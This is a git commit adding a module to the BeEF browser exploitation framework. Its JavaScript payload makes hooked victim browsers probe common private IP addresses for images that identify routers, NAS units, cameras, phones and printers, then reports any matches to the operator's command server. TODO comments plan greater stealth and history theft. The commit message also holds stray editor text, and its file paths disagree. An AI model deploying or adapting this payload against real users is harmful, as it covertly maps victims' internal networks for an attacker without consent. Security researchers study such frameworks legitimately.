Added ./modules/commands/network/fingerprint_local_network/

Experimental network module This module attempts to fingerprint embedded devices within the zombies'--This line, and those below, will be ignored-- local network. It does this by loading images on common local network IP addresses then matching the image width, height and path to thoseA for a known device. git-svn-id: https://beef.googlecode.com/svn/trunk@877 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-04-17 00:58:41 +00:00
parent 56bc17abcb
commit a50badff09
2 changed files with 121 additions and 0 deletions
--- a/modules/commands/network/detect_local_settings/fingerprint_local_network.js
+++ b/modules/commands/network/detect_local_settings/fingerprint_local_network.js
@@ -0,0 +1,51 @@
+beef.execute(function() {
+
+	var dom = document.createElement('b');
+	var ips = [
+		'http://192.168.0.1',
+		'http://192.168.0.100',
+		'http://192.168.0.254',
+		'http://192.168.1.1',
+		'http://192.168.1.100',
+		'http://192.168.1.254',
+		'http://10.0.0.1',
+		'http://10.1.1.1',
+		'http://192.168.2.1',
+		'http://192.168.2.254',
+		'http://192.168.100.1',
+		'http://192.168.100.254',
+		'http://192.168.123.1',
+		'http://192.168.123.254'
+	];
+	var urls = new Array(
+	new Array("QNAP NAS",":8080","/ajax_obj/img/running.gif",16,16),
+	new Array("QNAP NAS",":8080","/ajax_obj/images/qnap_logo_w.gif",115,21),
+	new Array("Belkin Router",":80","/images/title_2.gif",321,28),
+	new Array("SMC Networks",":80","/images/logo.gif",133,59),
+	new Array("Linksys NAS",":80","/Admin_top.JPG",750,52),
+	new Array("Linksys NAS",":80","/logo.jpg",194,52),
+	new Array("Linksys Network Camera",":80","/welcome.jpg",146,250),
+	new Array("Linksys Wireless-G Camera",":80","/header.gif",750,97),
+	new Array("Cisco IP Phone",":80","/Images/Logo",120,66),
+	new Array("Snom Phone",":80","/img/snom_logo.png",168,62),
+	new Array("Brother Printer",":80","/pbio/brother.gif",144,52),
+	new Array("HP LaserJet",":80","/hp/device/images/logo.gif",42,27)
+	);
+
+	// for each ip
+	for(var i=0; i < ips.length; i++) {
+
+		// for each url
+		for(var u=0; u < urls.length; u++) {
+			var img = new Image;
+			img.id = u;
+			img.src = ips[i]+urls[u][1]+urls[u][2];
+			//img.title = ips[i]+urls[u][1];
+			img.onload = function() { if (this.width == urls[this.id][3] && this.height == urls[this.id][4]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'device='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
+			dom.appendChild(img);
+		}
+	}
+	// setTimeout("beef.net.send('<%= @command_url %>', <%= @command_id %>,'device=Failed')", 60000)
+
+});
+
--- a/modules/commands/network/detect_local_settings/fingerprint_local_network.rb
+++ b/modules/commands/network/detect_local_settings/fingerprint_local_network.rb
@@ -0,0 +1,70 @@
+module BeEF
+module Modules
+module Commands
+#
+# Fingerprint local network module
+# This module attempts to fingerprint embedded devices within the zombies'
+# local network. It does this by loading images on common local network
+# IP addresses then matching the image width, height and path to those
+# for a known device.
+#
+# TODO #
+#
+# Add IPv6 support
+# Add HTTPS support
+# -  Devices with invalid certs are blocked by IE and FF by default
+# Improve stealth
+# -  Load images with CSS "background:" CSS to avoid http auth login popups
+# Improve speed
+# -  Make IP addresses a user-configurable option rather than a hard-coded list
+# -  Detect local ip range first - using browser history and/or with java
+#    - History theft via CSS history is patched in modern browsers.
+#    - Local IP theft with Java is slow and may fail
+
+
+class Fingerprint_local_network < BeEF::Command
+  
+  def initialize
+    super({
+      'Name' => 'Fingerprint local network',
+      'Description' => 'Scan common local network IP addresses for embedded devices.',
+      'Category' => 'Network',
+      'Author' => ['bcoles@gmail.com', 'wade'],
+      'File' => __FILE__
+    })
+
+    # Doesn't work in FF4 (but works in 3.x)    
+    set_target({
+        'verified_status' =>  VERIFIED_USER_NOTIFY,
+        'browser_name' =>     FF
+    })
+
+    set_target({
+	'verified_status' =>  VERIFIED_NOT_WORKING,
+	'browser_name' =>     O
+    })
+
+    set_target({
+        'verified_status' =>  VERIFIED_USER_NOTIFY,
+        'browser_name' =>     IE
+    })
+    
+    use_template!
+  end
+  
+  def callback
+	content = {}
+	content['device'] =@datastore['device'] if not @datastore['device'].nil?
+	content['url'] = @datastore['url'] if not @datastore['url'].nil?
+	if content.empty?
+		content['fail'] = 'Did not detect any local network devices'
+	end
+	save content
+  end
+
+end
+  
+end
+end
+end
+